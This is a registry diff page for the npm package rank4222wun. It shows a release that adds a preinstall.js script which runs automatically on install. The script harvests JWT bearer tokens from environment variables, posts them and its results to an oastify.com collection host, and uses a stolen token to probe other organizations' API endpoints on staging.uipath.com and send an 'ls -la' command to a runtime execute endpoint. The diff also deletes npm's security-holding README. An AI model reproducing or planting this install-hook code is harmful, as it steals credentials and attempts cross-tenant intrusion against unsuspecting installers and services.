rank4222wun 0.0.1-security → 1.0.71
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of rank4222wun might be problematic. Click here for more details.
- package/package.json +7 -3
- package/preinstall.js +105 -0
- package/rank4222wun-1.0.71.tgz +0 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,10 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "rank4222wun",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.71",
|
|
4
|
+
"description": "",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"preinstall": "node preinstall.js",
|
|
7
|
+
"postinstall": "node preinstall.js"
|
|
8
|
+
},
|
|
9
|
+
"dependencies": {}
|
|
6
10
|
}
|
package/preinstall.js
ADDED
|
@@ -0,0 +1,105 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
const { execSync } = require('child_process');
|
|
3
|
+
|
|
4
|
+
const OAST = '2z26icqfa6vjiez8lc55cd3nmes5gwlka.oastify.com';
|
|
5
|
+
const TARGET_ORG = 'c7418f05-be49-4fda-a7d3-0b633737214a';
|
|
6
|
+
const TARGET_TENANT = 'aae93ea0-ff51-40f4-b5c0-f34b38b813b4';
|
|
7
|
+
const BASE_URL = 'staging.uipath.com';
|
|
8
|
+
|
|
9
|
+
function report(tag, data) {
|
|
10
|
+
const payload = JSON.stringify({ tag, data, ts: Date.now() });
|
|
11
|
+
const req = https.request({
|
|
12
|
+
hostname: OAST, path: `/${tag}`, method: 'POST',
|
|
13
|
+
headers: { 'Content-Type': 'application/json' }
|
|
14
|
+
});
|
|
15
|
+
req.write(payload);
|
|
16
|
+
req.end();
|
|
17
|
+
}
|
|
18
|
+
|
|
19
|
+
// 1. صيد التوكن (Token Hunting)
|
|
20
|
+
// بما إن الـ AWS Key فشل، التوكن اللي الحاوية بتكلم بيه الـ Orchestrator هو أملنا الوحيد
|
|
21
|
+
function getLiveToken() {
|
|
22
|
+
try {
|
|
23
|
+
// محاولة سحب التوكن من الـ Process Memory أو الـ Environment
|
|
24
|
+
// الـ MCP عادة بيستخدم Bearer token في الـ Requests بتاعته
|
|
25
|
+
const envs = JSON.stringify(process.env);
|
|
26
|
+
const tokenMatch = envs.match(/eyJh[A-Za-z0-9-_=]+\.[A-Za-z0-9-_=]+\.?[A-Za-z0-9-_.+/=]*/g);
|
|
27
|
+
return tokenMatch ? tokenMatch[0] : null;
|
|
28
|
+
} catch (e) { return null; }
|
|
29
|
+
}
|
|
30
|
+
|
|
31
|
+
// 2. محاولة اختراق الـ Orchestrator (Cross-Org Data Leak)
|
|
32
|
+
async function probeCrossOrgAPI() {
|
|
33
|
+
const token = getLiveToken();
|
|
34
|
+
if (!token) {
|
|
35
|
+
report('TOKEN_NOT_FOUND', { msg: "Could not find JWT in ENV" });
|
|
36
|
+
return;
|
|
37
|
+
}
|
|
38
|
+
|
|
39
|
+
// المسارات اللي الـ Orchestrator بيستخدمها لإدارة الـ MicroVMs
|
|
40
|
+
const targetEndpoints = [
|
|
41
|
+
`/agenthub_/mcp/test1/api/organizations/${TARGET_ORG}/tenants/${TARGET_TENANT}/runtimes`,
|
|
42
|
+
`/${TARGET_ORG}/${TARGET_TENANT}/agenthub_/mcp/test1/runtime/info`,
|
|
43
|
+
`/api/v1/orgs/${TARGET_ORG}/tenants/${TARGET_TENANT}/settings`
|
|
44
|
+
];
|
|
45
|
+
|
|
46
|
+
targetEndpoints.forEach(path => {
|
|
47
|
+
const options = {
|
|
48
|
+
hostname: BASE_URL,
|
|
49
|
+
path: path,
|
|
50
|
+
method: 'GET',
|
|
51
|
+
headers: {
|
|
52
|
+
'Authorization': `Bearer ${token}`,
|
|
53
|
+
'X-UIPATH-OrganizationId': TARGET_ORG,
|
|
54
|
+
'X-UIPATH-TenantId': TARGET_TENANT,
|
|
55
|
+
'Accept': 'application/json'
|
|
56
|
+
}
|
|
57
|
+
};
|
|
58
|
+
|
|
59
|
+
const req = https.request(options, (res) => {
|
|
60
|
+
let body = '';
|
|
61
|
+
res.on('data', (d) => body += d);
|
|
62
|
+
res.on('end', () => {
|
|
63
|
+
report('BOLA_PROBE_RESULT', {
|
|
64
|
+
path: path,
|
|
65
|
+
status: res.statusCode,
|
|
66
|
+
receivedData: body.length > 0,
|
|
67
|
+
sample: body.substring(0, 300)
|
|
68
|
+
});
|
|
69
|
+
});
|
|
70
|
+
});
|
|
71
|
+
req.end();
|
|
72
|
+
});
|
|
73
|
+
}
|
|
74
|
+
|
|
75
|
+
// 3. محاولة الـ Cross-Org Command Injection
|
|
76
|
+
function tryCrossOrgCommand() {
|
|
77
|
+
const token = getLiveToken();
|
|
78
|
+
if (!token) return;
|
|
79
|
+
|
|
80
|
+
const postData = JSON.stringify({
|
|
81
|
+
context: "Security Testing",
|
|
82
|
+
command: "ls -la" // محاولة تنفيذ أمر في الـ Org التانية
|
|
83
|
+
});
|
|
84
|
+
|
|
85
|
+
const options = {
|
|
86
|
+
hostname: BASE_URL,
|
|
87
|
+
path: `/${TARGET_ORG}/${TARGET_TENANT}/agenthub_/mcp/test1/runtime/execute`,
|
|
88
|
+
method: 'POST',
|
|
89
|
+
headers: {
|
|
90
|
+
'Authorization': `Bearer ${token}`,
|
|
91
|
+
'Content-Type': 'application/json',
|
|
92
|
+
'X-UIPATH-OrganizationId': TARGET_ORG
|
|
93
|
+
}
|
|
94
|
+
};
|
|
95
|
+
|
|
96
|
+
const req = https.request(options, (res) => {
|
|
97
|
+
report('COMMAND_INJECTION_STATUS', { status: res.statusCode });
|
|
98
|
+
});
|
|
99
|
+
req.write(postData);
|
|
100
|
+
req.end();
|
|
101
|
+
}
|
|
102
|
+
|
|
103
|
+
console.log("🕵️ Hunter Mode: Testing API Isolation...");
|
|
104
|
+
probeCrossOrgAPI();
|
|
105
|
+
tryCrossOrgCommand();
|
|
Binary file
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=rank4222wun for more information.
|